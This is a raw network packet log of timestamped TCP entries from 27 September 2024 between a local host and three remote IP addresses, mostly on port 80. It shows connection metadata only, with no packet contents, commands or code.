                                                                          Sep 27, 2024 04:21:15.836956024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836968899 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836978912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.836987972 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.836996078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.837008953 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.837013960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.837027073 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.837032080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.837059975 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.837059975 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.843133926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843148947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843162060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843198061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843208075 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843218088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843230009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843230009 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.843240976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843269110 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.843296051 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.843588114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843600035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843609095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843619108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843631029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843647003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843647957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.843660116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.843678951 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.843707085 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844388008 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844400883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844419956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844430923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844445944 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844461918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844461918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844461918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844474077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844510078 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844540119 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844547987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844559908 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844569921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844592094 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844616890 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844647884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844660044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844670057 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844680071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844748974 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844768047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844779015 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844784975 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844791889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844805002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844815016 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844826937 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844846010 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844871998 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844886065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844897985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844907999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844918013 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844928026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.844949961 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.844974995 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845066071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845077038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845088005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845098019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845108032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845119953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845138073 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845165968 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845165968 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845196962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845205069 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845221996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845232010 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845242977 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845257044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845268011 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845294952 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845302105 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845319986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845339060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845355034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845365047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845371962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845376968 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845391989 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845428944 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845453024 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845463991 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845474005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845515966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845515966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845578909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845590115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845598936 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845609903 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845642090 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845673084 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845685005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845695019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845705032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845716000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845726967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845732927 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845738888 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845753908 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845777988 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845803022 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845833063 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845844030 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845854044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845864058 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845874071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845899105 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845916033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.845920086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.845963001 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.848681927 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:15.856745958 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:15.859669924 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859699965 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859709024 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859725952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859735966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859745026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859756947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859759092 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.859793901 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.859819889 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.859827995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859838963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859874964 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.859888077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859899998 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.859900951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859937906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859939098 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.859950066 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859988928 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.859994888 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.859998941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.860024929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.860050917 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.861522913 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867682934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867706060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867717028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867727041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867738962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867750883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867763996 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867789030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867794991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.867794991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.867800951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867811918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867830992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867837906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.867837906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.867842913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867856979 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867863894 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.867866993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867880106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867887974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.867892027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.867919922 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.867930889 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.868854046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.868904114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.868913889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.868923903 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.868935108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.868942022 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.868942022 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.868977070 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.868977070 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.868983030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.868993998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869004965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869015932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869056940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869056940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869076014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869086981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869102955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869112015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869134903 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869134903 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869184971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869198084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869213104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869221926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869230986 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869230986 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869292021 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869296074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869308949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869318008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869329929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869340897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869369984 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869369984 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869370937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869405031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869405031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869520903 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869534969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869622946 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869633913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869643927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869654894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869666100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869676113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869688034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869689941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869699001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869715929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869715929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869743109 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869762897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869775057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869786024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869796991 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869803905 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869807959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869817019 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869863033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869865894 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869904041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869915009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869925976 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.869940996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869940996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.869980097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870269060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870280981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870296001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870307922 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870318890 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870330095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870340109 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870349884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870349884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870349884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870368004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870379925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870389938 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870398045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870398998 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870404005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870417118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870428085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870438099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870452881 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870452881 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870457888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870470047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870481014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.870493889 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870493889 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.870522976 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.881001949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881032944 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881043911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881086111 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881094933 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881108046 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881108046 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881119967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881131887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881141901 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881145000 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881181002 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881220102 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881231070 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881242037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881253004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881263971 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881275892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881282091 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881299973 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881304026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.881329060 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.881355047 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.900835037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.900861025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.900871992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.900882959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.900893927 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.900903940 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.900917053 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.900919914 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.900963068 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.900995970 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.908889055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.908911943 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.908925056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.908937931 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.908948898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.908957958 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.908987999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.909024954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.909040928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909051895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909086943 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.909140110 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909210920 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.909214020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909229040 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909240961 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909276009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909279108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.909279108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.909287930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909305096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909316063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.909336090 CEST8049725185.215.113.117192.168.2.5
